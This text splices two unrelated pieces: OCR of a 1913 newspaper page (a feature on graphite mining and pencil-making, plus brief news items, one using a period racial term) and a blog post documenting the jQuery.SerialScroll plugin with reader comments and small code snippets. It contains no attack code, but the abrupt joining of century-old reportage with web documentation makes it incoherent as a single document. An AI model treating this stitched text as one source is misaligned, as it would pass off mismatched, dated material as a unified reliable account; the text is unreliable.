Some of these deposits contain 80 or 90 per cent pure graphite. This and artificial graphite are the materials most often used in the manufacture of lead pencils."

Every one speaks of a "lead" pencil as though it were really made of lead, but, as a matter of fact, there is no lead in a lead pencil. The heart or core of a "lead" pencil, commonly known as lead, is really graphite. It goes under three names: graphite, plumbago, and black lead. It is known as graphite in scientific circles, plumbago by the custom house people, and lead by the ordinary people.

History of the Lead Pencil

There is little real history to the lead pencil. It probably goes back two or three centuries, but that is all. Some old parchments have been found marked with lead ruling, but this must have been metallic lead. Le Moine, an authority of the early days, speaks of documents marked with graphite. Other writers have found papers evidently written with a piece of graphite inserted in the end of a stick. And this shows the evolution of the pencil.

The first pencil factory in America was founded by a school-girl. There was a graphite mine in England at that time called the Barrowdale mine. A school-girl obtained some pieces of graphite and anticipated quite closely the pencil method of modern days. In some way she crushed the graphite, either with a hammer or a stone, and then used gum, mixing the two together. Then she cut an alder cylinder, filled it with this gum and graphite, and thus produced the first lead pencil made in America. This took place in Danvers, Mass. Later a man by the name of Joseph W. Wade co-operated with the girl, and together they made a number of lead pencils after the same fashion. The girl's name was not recorded.

The Barrowdale mine in England was the source of the first graphite, and the pieces quarried were said to be in such form that they could be sawed and pressed into the wood. Scientists say, however, that pieces of this kind were not very numerous. Later it occurred to a Frenchman named Conte to powder the graphite and then combine the pulverized substance with a binding material. He worked on his scheme until he produced the graphite part of the pencil substantially as it is made now. Not much, however, was done with it, either by Conte or by any other Frenchman. The Germans then took it up, and while the Frenchman was the real inventor, to the Germans belongs the credit of working out and putting into its present shape the lead pencil as we know it today.

The work of pencil-making is picturesque. It is ingenious and attractive, and the method reflects rare mechanical talent. The number of raw materials used is between 40 and 50, and the whole world contributes to the assembling of these materials. Most of the processes are done by automatic machinery.

The Mines in Ceylon

Edson S. Bastin is Uncle Sam's scientist in the geological survey at Washington, who has made a study of graphite for many years. In speaking of mining graphite in Ceylon, Mr. Bastin said:

"Although their existence was known in early times and mentioned in print as early as 1681, the graphite deposits of Ceylon were not exploited until some time between 1820 and 1830.
Joseph Dixon is said to have imported a small quantity into the United States in 1829, but it was not until 1834 that the industry assumed any commercial importance. From that time to this, as a result of the growth of the metal industries and the great demand, the industry has developed rapidly, until at present graphite is subordinate in value only to tea and the products of the cocoanut palm among the exports from the island.

"The graphite is mined either from the open pits or through vertical shafts connected with underground workings. The majority of mines are not deeper than 100 feet, though a few go as deep as 400 or 500 feet. On account of the heavy rainfall, water is one of the chief obstacles in mining. In a few mines steam pumps and hoists are employed, but as a rule the mining methods are still crude, the acme of mechanical ingenuity being reached in a windlass operated by five or six men to hoist the graphite in a sort of tub. The workmen usually climb rough wooden ladders hundreds of feet long. The ladders are tied with jungle ropes and rendered very slippery by the graphite dust and water, so you can imagine what a hazardous job it is.

"The mineral as it comes from the pit usually contains about 50 per cent of impurities, mostly in the form of quartz and wallrock. It is carried in bags to a dressing shed, where it is picked over by hand and the impurities reduced to 5 or 10 per cent. It is then packed in barrels for transportation to Colombo or Galle. At these ports it is unpacked and submitted to further treatment known as 'curing.' The graphite merchants have fenced yards or 'compounds' for the final preparation of the graphite for the market.

"In the methods of 'curing' there is some diversity, but the first step is usually to set aside large lumps and pass the remainder through stationary screens of several sizes of mesh.
The large lumps and the screened pieces are then broken with small hatchets by Singhalese women to remove the coarse impurities, such as quartz, and are then rubbed up by hand on a piece of wet burlap and finally on a piece of screen to give them a polish. Finally, various grades coming from several mines or differing in size or texture are blended to meet the demands of purchasers, a process requiring skill and long experience.

Best Pencils Made of a Blend.

"The poor material is usually beaten to a powder with wooden mauls or with beaters shaped like a rolling pin, and is then sorted into different grades. In some establishments the poor grades are washed in a tub or pit. In this process the mineral is placed in saucer-shaped baskets, and by a circular 'paling' motion of the baskets under water the graphite particles are thrown off into the pit, while the heavier impurities, especially pyrite, remain behind. To separate the very fine material the powdered graphite is placed in a basket looking like a large dustpan. The contents of the basket are thrown into the air, and the heavier particles fall back into the basket, while the finer material is blown forward and thrown on the floor.

"The use of graphite in the manufacture of pencils probably is both its oldest and best known application. The industry in Germany and England is several centuries old, and many of the modern factories manufacture hundreds of varieties of pencils, yet the percentage of graphite used for this purpose is not large, being less than 10 per cent of the world's production, and one authority estimates it as low as 4 per cent.

"In this country the physical character of the graphite is of great importance. Crystalline graphite, however pure, would, if used alone, yield a 'lead' that would slip over paper without leaving more than a faint streak. Further, it is almost impossible to grind the flake graphite into a powder of the finest grain required for the better grades of pencils.
The better grades of graphite constitute the bulk of material used in pencil manufacture. For some of the cheaper pencils only one kind of graphite is used, but the graphite for pencils of the better grades is a careful blend of several kinds. One blend, for example, contains about one-third Ceylon graphite, one-third Bohemian, and one-third Mexican. The Ceylon graphite adds to the smoothness of the 'lead,' the Bohemian adds blackness.

"Graphite when used for pencils is mixed with carefully refined clay, which is usually imported from Germany; no domestic clay has been found entirely suitable for pencil manufacture. The more graphite and the less clay, the softer the pencil; the less graphite and the more clay, the harder the pencil. The cores of softer pencils are usually made larger than those of the harder ones in order to give them equal tensile strength. For a pencil of medium hardness about one-third clay is commonly used. The wet mixture of clay and graphite is worked and reworked until it is so pliable that it can be looped in loose knots.

An American Graphite Mine.

"Up to a few years ago the American pencil manufacturer had to import his graphite from India or Bavaria. About twelve years ago a large deposit of amorphous graphite was discovered in Sonora, Mexico. This proved to be of excellent quality for pencil making and many other uses, and the American pencil trade now derives its supply mainly from this source. Some Mexican graphite is also exported to European pencil manufacturers.

"A use which has increased rapidly in importance within the last few years is the manufacture of graphite paint, especially for structural iron and steel work. Much of the graphite used for this purpose is rather
impure. Recent tests made in co-operation between the office of public roads of the Department of Agriculture and the Paint Manufacturers' Association, for the purpose of determining the relative merits of various paint pigments as preservative coatings for iron and steel, have yielded results of great importance."

What nature can do, man can sometimes do even better, and in the case of making graphite, a single company, using the power generated by Niagara Falls, manufactures more artificial graphite than all the graphite produced by the mines of the United States. Hard coal with a small amount of ash is the material used, and the electric furnace does the rest.

85 Pencils a Year for Each Human.

The process is a patented one. The product is used largely as a lubricant, known generally to the trade as plumbago, and the invention solves the problem of the supply of grease to make the world go round, so long at least as the coal supply lasts. Since 1904 this company has made fully 50,000,000 pounds of graphite at an average cost of 7 cents a pound, and a multitude of wheels of industry have thus been made to spin more easily. Graphite greatly improves the oil as a lubricant in every respect.
Specially prepared graphite will remain suspended in oil, displaying no tendency to sink, so that it can be fed through automatic oil cups. When suspended in water this graphite will pass through the finest filter paper.

The use of graphite in pencil making is its oldest application, but the percentage of graphite used for this purpose is estimated as low as 4 per cent of the total production. Still, with a world's production annually of about 5,000,000 tons, it can be seen that, allowing 4 per cent for pencils, or 200,000 tons, there would be some pencils. Two hundred thousand tons is 6,400,000,000 ounces, and one ounce of graphite will make the "lead" for 20 pencils. This is 85 pencils for every man, woman and child in the world, illiterate, heathen and all.

Another use for graphite is in the manufacture of crucibles for making fine grades of steel, brass and bronzes. The fact that graphite is nearly pure carbon, is relatively inert chemically, and volatilizes only at high temperature makes it of exceptional value for this purpose. The graphite used in the United States for crucibles is imported from the graphite mines of Ceylon, the equal of the Ceylon product for this purpose not being found in any other locality. Stirring rods and other refractory products are made from material similar to that used in crucibles. Another important use is as a rust preventive for structural iron and steel. Graphite is also largely used in various electrical processes, for stove blacking, and as a protective coating for gunpowder.

The story of what is probably the oldest graphite mine within the United States is interesting. This mine became known to the whites in 1633, and has been worked intermittently for more than two centuries and a half. Recently a company has been incorporated which is now attempting to develop the property by the methods of modern mining engineering.
The mine is located in the midst of a tract of land almost as wild and desolate to-day as it was a century ago, near Sturbridge, Mass. The existence of this deposit of graphite was known early in the colony's history. About 1633 one John Oldham, of interesting memory in connection with the battle of Plymouth and the Massachusetts Bay Colonies, made a trip overland to Canada, trading with the Indians on the way. He returned with a stock of hemp and beaver, and also brought along some "black lead" he found near Sturbridge. The Indians told him there were great quantities of it around that region.

Governor Winthrop became interested, and made a contract with a man named Keene for developing and working the mine. Winthrop was to advance 20 pounds in trading cloth and wampum, in consideration of which Keene agreed to go to the Black Lead Hill with a number of men, and there to dig the black lead, for which he was to be paid at "the rate of 40 shillings for every tonne when he had digged up 20 tunnes of good merchantable black lead and put it into an house safe from the Indians."

The venture came to nothing, and for a number of years the mine lay idle, although schemes for its development were often under discussion. It was thought then that the presence of graphite indicated the nearness of silver, but no silver being found, the early colonists were much discouraged. The mine was so remote it was hard to get workmen to go into the wilderness or to stay there after they arrived. And so it remained for two centuries, until finally early in the nineteenth century the value of graphite became known, and the
mining of the mineral was undertaken and carried on up to the present time.

Six Stitches in His Heart.

New Orleans, Jan. 25.-Making a half dozen stitches in a negro's heart while almost blinded by blood, which spurted from that organ, was part of a remarkable operation performed to-day by Dr. J. A. Hanna, house surgeon of Charity Hospital.
The patient, Lodge Leo, who was stabbed in a row with a woman, was conscious throughout the ordeal, and conversed with those about the table. Hospital attendants say he will live.

There are more brands of cussedness than there are brands of religion.

To India as Missionaries. Rev. and Mrs. Ranson, of Charlotte, Sail February 15th.

(Anderson Mail.) Rev. and Mrs. J. W. Ranson, of Charlotte, N. C., are going to India as missionaries from the Associate Reformed Presbyterian church. Rev. Mr. Ranson attended a meeting of the board of foreign missions of the church, held at Due West a few days ago, at which time it was decided that he should take up the work. He will at once begin preparation for work in India and will sail for that country on February 15th. Much of the funds necessary for the expenses and maintenance of Mr. and Mrs. Ranson in the mission field was raised in Charlotte and in Mecklenburg county, North Carolina, of which Mr. Ranson is a native.

"Human Bomb" Convicted.

Los Angeles, Jan. 25.-Carl Reidelbach, the "human bomb," who terrorized the central police station several months ago, when he entered it carrying an infernal machine, and announced that he intended to blow everything into "kingdom come," was convicted to-day on the charge of having deposited dynamite in an inhabited place.
http://chroniclingamerica.loc.gov/lccn/sn84026912/1913-02-05/ed-1/seq-2/ocr/
Notice

I've pretty much stopped updating this blog, but the plugin development is still on-going. You can find the link to the Github project page at the bottom of the article.

Introduction

This plugin doesn't have one definite purpose; it's generic and adaptable. You can certainly use it as a screen slider, that is, to sequentially navigate a group of screens. It can also animate a text scroller in no time. It can definitely handle slideshows, and the high customizability of the scrolling effect lets you create beautiful animations. You can even build an automatic news ticker! Three of these uses are exemplified in the demo. Remember, it's not restricted to these situations: it will take care of any collection of HTML elements that you want to scroll consecutively.

Settings and customization

jQuery.SerialScroll gives you access to a lot of options. These are:

target: The element to scroll, relative to the matched element. If you don't specify this option, the scrolled element is the one you called serialScroll on.
event: Which event to react to (click by default).
start: First element of the series (zero-based index, 0 by default).
step: How many elements to scroll each time. Use a negative number to go the other way.
lock: If true (default), the plugin will ignore events while already animating, so animations can't be queued.
cycle: If true, the first element will be shown after going past the last, and the other way around.
stop: If true, the plugin will stop any previous animation of the element, to avoid queuing.
force: If true, an initial scroll will be forced on start.
jump: If true, the specified event can be triggered on the items, and the container will scroll to them.
items: Selector for the items (relative to the scrolled element).
prev (optional): Selector for the 'previous' button.
next (optional): Selector for the 'next' button.
lazy: If true, the items are collected each time, allowing dynamic content (AJAX, AHAH, jQuery manipulation, etc.).
interval: If you specify a number, the plugin will add auto-scrolling with that interval.
constant: Should the speed remain constant, no matter how many items are scrolled at once? (true by default).
navigation: Optionally, a selector for a group of elements that allow scrolling to specific elements by index. Can be fewer than the number of items.
exclude (new): If you want the plugin to stop scrolling before the actual last element, set this to a number, and that many items are ignored counting from the end. This is useful if you show many items simultaneously; in that case, you probably want to set this option to the number of visible items minus one.
onBefore: A function to be called before each scroll. It receives the following arguments: the event object, the targeted element, the element to be scrolled, the collection of items, and the position of the targeted element in the collection. The scope (this) will point to the element that got the event. If the function returns false, the event is ignored.

Check the demo to see all of them in action.

The option 'target'

This option is a new addition, included since 1.2.0. Before, you needed to call the plugin once for each scrolled element. When this option is specified, the matched elements are no longer the scrolled elements, but a container. In this case, the selectors of prev, next, navigation and target will be relative to this container, allowing you to call SerialScroll on many elements at once.

External manipulation, event triggering

jQuery.SerialScroll automatically binds the following custom events to the containers:

prev.serialScroll: Scrolls to the previous element.
next.serialScroll: Scrolls to the next element.
goto.serialScroll: Scrolls to the specified index, starting at 0.
start.serialScroll: (Re)starts auto-scrolling.
stop.serialScroll: Stops the auto-scrolling.
notify.serialScroll: Updates the active item.
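Taken together, the start, step, cycle and exclude options reduce to simple index arithmetic. The sketch below is a simplified model for illustration only; the function name and logic are mine, not taken from the plugin's source (non-cycling moves past an edge are modeled as ignored, following the behavior the author describes):

```javascript
// Simplified model of how serialScroll's step/cycle/exclude options
// could interact when picking the next item index. Illustrative only.
function nextIndex(current, step, total, cycle, exclude) {
  var last = total - 1 - exclude;             // 'exclude' ignores trailing items
  var next = current + step;
  if (next >= 0 && next <= last) return next; // in range: just move
  if (!cycle) return current;                 // past an edge: ignore the event
  return next < 0 ? last : 0;                 // cycling: wrap to the other end
}
```

With cycle on, stepping past either end wraps to the opposite one; with it off, the event is simply ignored at the edges, which is why the demo's non-circular sliders appear to stop there.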
$(container).trigger( 'prev' );
$(container).trigger( 'next' );
$(container).trigger( 'goto', [ 3 ] );
$(container).trigger( 'start' );
$(container).trigger( 'stop' );
$(container).trigger( 'notify', [ 4 ] );

'notify' also accepts a DOM element (an item), or any of its descendants. $(container) is the element that gets scrolled each time: if you specified a 'target', then that element; else, the element you called the plugin on. Note that to use 'start' and 'stop' you need to use the option 'interval' first. If your container element already has any of these event names bound (odd!), then just add the namespace when you trigger. You probably won't need to deal with these events, but if so, this is how.

What makes jQuery.SerialScroll so special?

This plugin has many positive features. Of course, it won't fit everyone's needs; that's impossible.

Small footprint

This plugin is tiny. As said before, it requires jQuery.ScrollTo; both plugins together take less than 3.5 KB minified. If by chance you decide to include jQuery.LocalScroll, the three of them require less than 5 KB. Including this plugin is not a bad idea: it can be used, instead of the option 'navigation', to build a widget with sequential and random scrolling.

Highly customizable

This plugin has many settings to customize; in addition, it can use jQuery.ScrollTo's settings. That makes 27 different options! If you take a while to analyze them all, you can make your work really unique.

Accessible, degrades gracefully

Probably many will automatically skip this part. Shame on you! If you make sure non-JavaScript users will see the scrollbars, then they can perfectly navigate your content. You can easily show the scrollbars only for these few users using CSS/JS. This is one of the main differences with many similar scripts: they generate the content and the styling using JavaScript.

Adaptable

jQuery.SerialScroll won't alter the HTML or styles at all. You are in control of the styles and content of your collections.
You don't need the plugin to decide what HTML to use, or how many items to show simultaneously, and you can safely change that yourself; the plugin will always work. The items don't need to have fixed size, nor to be aligned. SerialScroll will scroll from one to the other, no matter what. If you want a plugin with premade styles or automatic generation of HTML, then you should consider any of the jQuery carousels.

Generic and reusable

Finally, as mentioned before, this plugin can be used for many different situations and doesn't have one specific application.

134 comments:

Excellent tutorials and examples! I've been trying to do something like this myself!

Okay, that's pretty sweet. Thanks so much for your great contributions, Ariel!

I have a collection of objects to scroll, and this plugin works perfectly, except for one catch. Namely, the collection of objects can be re-ordered. If the user reorders the scrollable items, scrolling then jumps to where they used to be instead of where they are now. Is there a reset() I am missing, or how do I detach and reattach it after reordering? Thanks, Dennis

I am rereading my earlier post and realized I forgot to ask if there is a way, in the onBefore method, to exit without causing the scrolling to advance. Thanks again.

Hi motobass, the first thing can be achieved with a little change, sacrificing some performance, but that shouldn't be so tragic. The second one can also be added, easily. Please add both as feature requests; I'll try to add them in a new release, ASAP. Cheers

Hi motobass, I added a new release (1.0.1) which includes both features. If the 'onBefore' returns false, the event is ignored. And if the new option 'lazy' is true, the items can be safely added/removed/reordered. Cheers

I have an unordered list and I'm using serialScroll to go back and forth between its list items. The scroll is triggered by two links.
Now, what I want is that when the scroll reaches the first LI element, the back trigger link is hidden [as there is nowhere to go back]. The same with the next link: if I reach the last LI, I want to hide the next link. Is there a way to read the currently displayed LI element, or another way to achieve this?

Hi Stefan, I'm planning to add a specific callback for when you reach the edge. But for now, you can handle your situation with the callbacks 'onBefore' or 'onAfter'. Both get as one argument the element you scrolled to. So you keep the collection of items in a variable, and then you do: var index = $the_items.index(elem); So you now have the index of the item. If it's 0, you hide the 'prev'. If it's $the_items.length - 1, you hide the 'next'. Don't forget to show them back after. I'll update the post once I add a release. Cheers

I forgot to add... You know there's a 'cycle' option, right? It will make the list circular, so when it reaches the limit, it pulls back.

Ariel, thank you so much for getting back to me! I forgot to thank you for your work! These plugins of yours are amazing! I am aware of the cycle option, but this is not what I wanted. Instead, I was looking for an index, a variable which holds the current LI index. I will tackle this path! Thank you!

You should add the possibility of calling the 'slide' from outside the scope of the object itself. For example, when you have the slider and a navigation menu as well, where clicking an item in the menu would slide to the corresponding item in the slider. You can of course simulate this with the onBefore and onAfter methods, but then the next/previous in the actual slider won't be in sync anymore... Just a thought...
My best shot was:

$("#sections li:first").attr("id","first");
$("#sections li:last").attr("id","last");

Then:

onAfter: function( elem ){
  var currentView = $(elem).attr("id");
  if ( currentView == "first" ) {
    $("#arrow-left a").fadeOut("fast");
  } else {
    $("#arrow-left a").fadeIn("slow");
  }
  if ( currentView == "last" ) {
    $("#arrow-right a").fadeOut("fast");
  } else {
    $("#arrow-right a").fadeIn("slow");
  }
}

Maybe it is not very elegant, but it works, and that is what's important for me at this stage. Ariel, thanks again for pointing me in the right direction!

@stefan I'm glad you solved it. I was thinking of an index-based check, but that option is very feasible. I'll add the actual index as the 4th or 3rd argument of the onBefore, and possibly a specific event 'onReachLimit' or something like that.

@laddi Your suggestion seems pretty reasonable. I'll see what I can do for the next release. Note that for the specific case you mentioned, in case you are interested, you can use jQuery.LocalScroll. It also uses jQuery.ScrollTo, and they can be safely combined; the overhead will be really small. Could any of you (or both) add these things as feature requests? Thanks!

@stefan and laddi Added a new release (1.1.0). Now it's possible to manipulate the animations from outside, using the custom events of the container (prev, next, goto). Also added 2 arguments to the onBefore that make the check stefan needed really easy to do. Finally, added an option 'interval' for auto-scrolling. Cheers, check the demo, it's updated.

Excellent work, man! I created the feature request already, but you can just ignore that... ;) Again, great stuff! :D

Sorry for the delay, this is the page where I used your plugin and modified it (the logos with the arrows). The problem was that it always scrolls a fixed number of items, and if you have (items % steps != 0) then you will have some empty space on the last step.
If you want, I can give you the modified source (I posted the modified section in the last comment, which was deleted). Thanks.

Hi, sorry, I thought you agreed with me as you weren't replying. I really try to keep this clean. Do you have any kind of IM? We can discuss your code more easily. Cheers

Thank you Ariel. Very nice plugin. One problem I have is that I can't seem to stop a rotation in progress. It stops for a little bit and then continues on. I'm having it auto-scroll on load. I'm using $(container).stop(). Anything I'm missing?

Hi David, use $('#pane').trigger('stop'); and $('#pane').trigger('start',[intv]); where $('#pane') is the container that gets scrolled. I'll add this to the docs right away. Please get 1.1.1.

Wow. Thanks for the quick response Ariel! You rock. Works like a charm.

Hi Ariel, I am trying to use your plugin to manage a horizontal div of images. The div structure is pretty simple: there is a container div, a clipping div, and an items div that is sized width-wise to hold all the images. I am able to scroll without any problems. However, if I use goto to jump to a position, I get somewhat unexpected behavior. Specifically, if I 'goto' the last element in the list, I then have to hit 'prev' twice before the images start scrolling again. I unfortunately don't have a public site to point you to, but thought you might know offhand what the problem is. By the way, I think the problem has to do with the fact that the last element cannot scroll all the way to the leftmost position, since it is at the end of the div (which is the effect I need). So it then takes several 'prev' operations to get everything lined up again.

Hi Edward, indeed that is the problem. While other similar plugins ask you to specify item size, or a certain number of items to show each time, SerialScroll is more unrestricted.
One way to make this work, if it fits you, is to set the step to the number of items you are showing each time, so you don't get to see fewer items and you don't get stuck. I wanted to make the plugin aware of the end, but that seems to require lots of code with so few restrictions. You could also play with the option 'offset'. Cheers, you can contact me by email if you want.

Hi Ariel, thanks for the fast reply. I think the answer for what I'm trying to do will be to make the list circular with the 'lazy' option on, so I can ensure the user can always move freely in both directions. My thinking is that I can double my list up, then check to see when the last element is at the start of my viewport and, if so, adjust the set of items accordingly. I'll let you know how it goes. Thanks for the excellent plugin and the support. Our site should be up soon...

Hi Edward, what you plan to do is something I feared adding to the core, as getting into cloning can only bring trouble. I'm interested, though, in seeing how you implement it; let me know when you have it ready :) Cheers

There shouldn't be any need for that, unless you want it to scroll less than a step when you are close to the limit. Right now, it will ignore the event if not cycling, or go to the last element otherwise.

Hi, been looking around for something like this, great work! In the absence of a forum, I wondered if you could answer a quick question: is it possible to control 2 different containers with 1 external click (link)? To explain: I am trying to develop a timeline application where one container shows page thumbnails (3 whole pages + 2 half pages either side) and the other container shows the larger version of the thumbnail that appears in the centre of the first container. I would like to control both containers with a series of links (along the bottom of the browser window) that correspond to the #id of each thumbnail (ideally I'd like to display the id in the query string depending on which link was clicked).
Is this possible, and if so, how? PS: I can point you to a mocked-up version if it helps you to understand my ramblings!

Hi Jock, I do understand. You can certainly scroll 2 containers together. You just match both with one selector when you call the plugin, e.g. $('#one,#two').serialScroll(... or, with the alternate (new) way: $('#cont').serialScroll({ target: '#one,#two' }); I'd advise you to check LocalScroll; I think that's what you are looking for. Cheers

Wow, that's what I call a fast response! I will give it a go, although I am not an expert in this language. If I have any other questions, do you mind if I post another comment? PS: If you created the page for me, I could pay you for your time via PayPal or something. I'm on a bit of a deadline with this one. Thanks again, you're a star!

You can surely post more comments, or contact me by email (it's in the plugin). I can't do it for you right now, sorry :) Cheers

You were right, I was talking about SerialScroll. As I told you, I am busy making a carousel, but I don't want the prev/next buttons to be visible when the first/last item is visible. It should work like the jCarousel or Accessible News Slider plugins, where the buttons are disabled or not visible. But with SerialScroll you can add more features more easily than with those plugins.

Hi IschaGast, although that's true, I like to keep my plugin generic. One might not want to hide them, or might want to use a fade, or to shrink them; should I add all the possibilities? I don't think so. You can easily do that yourself using the onBefore. One of the arguments is the collection of elements, and another one is the actual index (check the source of the demo). So you do (inside the onBefore):

$('#prev,#next').show();
if( pos == 0 ) $('#prev').hide();
else if( pos == $items.length-1 ) $('#next').hide();

where prev and next are the ids; you can use any selector. Cheers

Ariel, again, great plugin!!! I was wondering if it's possible to add the following to make it even more flexible.
say you have a ul and you rotate through the li items. it may happen that the li items have varying heights. would it be possible to change the height of the container (ul) to match the height of the li element, so that you could rotate through items of different heights? thanks, David Hi David That is surely a useful feature, but not something everyone will need. In my list of priorities, size is the 1st one, extensibility the 2nd, and generality the 3rd. I think the plugin lets you do that easily, without adding it to the core. In the onBefore event, you do: $pane.animate({height:$(elem).height()},800); I used the argument names of the demo, and the 800 is random. Truly, thanks for opining! As always, a speedy response and just what I was looking for. I guess I wasn't really suggesting to add it to the core, but just asking how to do it in general. Thank you very much for the answer. I'm having a hard time making an "auto" news ticker (much like the demo's) stop when I hover one div (and call stop.serialScroll). stop.serialScroll is reached, but the auto-scrolling continues nonetheless. What's the best way to implement a "pause on hovered element" functionality? Hi, Let's take the news ticker from the demo as an example, you need to do: $('#news-ticker').hover( function(){ $(this).trigger('stop'); }, function(){ $(this).trigger('start'); }); That should do :) Cheers Hi, I just can't manage to stop the autoscroll... I made an automatic news slider from your first example, it works well, I added a button and I created a function that does this: $('#stop-news').click(function(){ $('#screen').trigger( 'stop' ); }); Any help would be appreciated... Thanks for your great work! Hi Aurélien Do you have a demo of this online? If you are using the html from the demo.. #screen is not the element being scrolled, you need to call 'stop' on the 'target' if you specify one. It needs to be the element being scrolled. For everyone: For further comments, please use this post.
Hi, This is what I was searching for: $('#prev,#next').show(); if( pos == 0 ) $('#prev').hide(); else if( pos == $items.length-1 ) $('#next').hide(); The only thing that doesn't work is this rule: if( pos == 0 ) $('#prev').hide(); It works when you go to position 2 and then go back but on loading the prev button is still visible. You can solve that with this: $('#prev').hide(); But it would be more elegant if it also worked on loading. Do you know how that is possible that it won't work? Thank you for you very quick reply the last time! Keep up the great work :) Hi... I am trying to build a horizontal news ticker from this Plugin, here is my demo page Is it possible to make this ticker scrolls horizontally and from right to left? Thanks! @IschaGast You mean, why does the button start visible when the page renders ? If so, you just hide it with css, it will obviously be visible until you click arrows. If for some reason you can't alter css, you can work around: $(document).ready(function(){ $('#pane').trigger('goto',[0]); }); @emad You can surely make it work horizontally. You can use any of ScrollTo's settings. One of them is 'axis', you set to 'x'. As for right to left, yes, since the last release, you just need to set a negative 'step' option. If you want it to start on the right, use the option 'start' and set 'force' to true. Cheers I think all the examples of SerialScroll use fixed-width items. I wrestled with jCarousel for a long while, trying to make it work with images where some were 'wide' and others were 'tall'. Before I dive in a spend lots of time, can you tell me how SerialSCroll would handle a horizontal scroll of items that have unequal widths? thanks Don Hi Don You are, all the examples have fixed size, but NO. That's not required at all. That's actually one of its major features (I should emphasize that...). It uses ScrollTo, so the plugin will jump from one item to the other, they don't need to have fixed size, or even be aligned. 
You just put your items wherever you want, it should work perfectly. Hi, I'm trying to do a page scroller so that the whole page would always scroll to the next visible heading element when pressing the down key. I'm trying to use SerialScroll, but it won't scroll any further than the first h2 element and then starts to loop on the same h2 element? Any ideas where I went wrong? My current code is: $(document).keyup(function(event){ if (event.keyCode == 40) { $.serialScroll({items:'h2',duration:700,force:true,axis:'y',offset:-10}); } }); Hi Niko, Try this: Pastebins look so much better :) Cheers oh, I had totally misunderstood that triggering thing. Many thanks, now it works like I intended, although I changed "force" back to "false" in order to not loop the whole document. Thanks, niko Hi, thanks for the plugin, I want to use it for my online portfolio. I'm a beginner and I don't know anything about JavaScript. I have a question: I'd like the links of my menu to reload the main container via AJAX. How can I do that simply? Thank you very much. Hi Gyzmo I don't understand what you want this plugin to do in relation to loading the screens by AJAX. To load the screens, check this link: AJAX docs If you need this plugin, please explain how, and I'll help you. Cheers, for further commenting, please use this post. Hi, thank you for your answer. Sorry, my explanation was not clear. Instead of using a frame or object I'd like to use AJAX: I just want to have my menu with all my anchors, and SerialScroll on another div, a little similar to that example or that. Hi Ariel, I made this: You can toggle between list view and the view with the great images. I only have one problem that can be seen when you do this: * click to the third item * click the view toggle link * click that link again Now you see that the slideshow will go back to position one. What I want is that it stays at the position it was. Is that possible?
I had to insert this to see the list view anyway: $('body.domenabled #item_news .item_news_container').trigger('goto', [0]); Firebug didn't show what the scroll script is doing. I think the ul is being moved with margin-left or position:relative, but resetting both of those properties to 0 didn't let me see that list view. That's why that line is there. First I used the Cycle plugin, but after some testing the ScrollTo plugin is better because it doesn't change anything in your HTML. Which means you have full control! That rocks! @Gyzmo It seems like what you want is LocalScroll, not SerialScroll, right? The 2nd demo you linked doesn't have any kind of scroll animation, just... ajax. You don't need any plugin to do that, just jQuery. If what you need is LocalScroll, please comment on its last post. @IschaGast Welcome back :) That link you mentioned is the one you need to remove, it's causing the container to pull back each time. Why would you add that, if that's not what you need? Anyway, that should solve this. Cheers That's just what I want. I want users to be able to switch between list view and photo view. Some users don't want to scroll 5 times to see the last item but want to see directly how many items there are. With that link I toggle between those two views. First it wasn't really clear because what you saw was Dutch. In the js you see .trigger('goto', [0]); that one I use to get the list visible, because without it you only see a white screen. There are two solutions: one, I need to know what property is changed when moving the list items, because setting the margin/position left of the ul to zero didn't do anything. Number two: I have to remember which position the slideshow was at at the moment of the switch. When switching back it should start there. One more thing. First I tried this: .trigger('start') but that didn't do anything. I don't know why?
I hope it's clear what my problem is :) I love coming back to great jQuery plugins and people that are willing to help some JS newbie's ;) I appreciate that a lot. Hi .trigger('start') is used to restart a previously stopped auto-animation. If you want auto scrolling, use the option 'interval'. I think you are approaching this in a wrong way. You should have one div/ul containing the pics with arrows. That container gets scrolled. On the other hand, you have ANOTHER div/ul that contains the list-view, this one doesn't get scrolled. If you use the option 'navigation' with the list-view items, it'll solve your problem automatically. If you need more help, you can contact me by mail if you want. Cheers Just wanted to thank you for your wonderful scrips. Keep up the great work. Cheers. Thanks Andrei!! I love this kind of posts :) Ariel, firstly let me say that this is fantastic. I'm a web designer, I code HTML and CSS but design's my passion. I know nothing about Javascript at all, and javascript and interactivity are becoming more and more popular, and it's free plugins like this that make my life so much easier! So thank you! I do have one question. I'm using the code from the first example, the navigation one. I've edited it slightly so that 3 li's appear at once in the sections div, and also so that each click of the arrow scrolls past 3 li's. I'm using 6 li's, so you see the first 3, then scroll to 4 5 and 6, and then another scroll just shows the last one again on it's own - is there anyway that once the last 3 are shown, it cycles back to the start again rather than just showing the last one again on its own? I hope this makes sense and you can help me, if it can't be done I can probably live without, but if there's something I'm missing or doing wrong it would be great to have a kick in the right direction! Once again many thanks for this script whether I get my bug fixed or not, it's great. Hi Matt Can you give me a link to this so I can see? 
You can mail it to me if you don't want to make it public. Thanks Hi Ariel, I just sent an email to your gmail account, thanks! Love the script! Quick question .. is there a way to highlight the navigation when you're on the corresponding/current "section"? It's great as it is, but it would be nice to see where you're at in the slides in the navigation as well. Thanks again!! Hi Ringo Yes, you do that yourself using the onBefore event, it receives all the information you need. I want to make a post with some patterns for this plugin, but I'm being lazy :) Cheers ah. looks like it's been mentioned before. thanks. .. and thanks for being so patient & helpful with everyone and their questions! Hello Ariel, is there any way to launch onBefore at the initialization of the SerialScroll? I'd like my right arrow to be disabled if there isn't items to be scrolled (i.e. if there's only one) and I don't know how to do it except using the onBefore method, which knows the items length. Thanks for your answer and your plugin. Nico Hi Nico You can do $('#pane').trigger('goto',[0]); To force it, but you'll need to set 'start' to 1 or something else, so there is a change. Cheers Hi Ariel, Ben here. Would it be possible to make it so if a user holds down their mouse button over the arrow it'll keep scrolling until released? I know I could apply an onmouseover event, but I would prefer it to only keep scrolling if the mouse button is pressed. Cheers. p.s. Great plugins! Hi Ben, thanks That will require the mousehold plugin for jQuery and in the callback, you use $('...').trigger('next'); Ciao Ariel, This is a life savor! Can you tell is there a way to have it on a continuous loop? So instead of it essentially rewinding when cycle is true, the next item shown would be the first item shown. Thanks, Kurt Hi No, the plugin avoids doing dom manipulation, so something like this, has to be done by the end developer. 
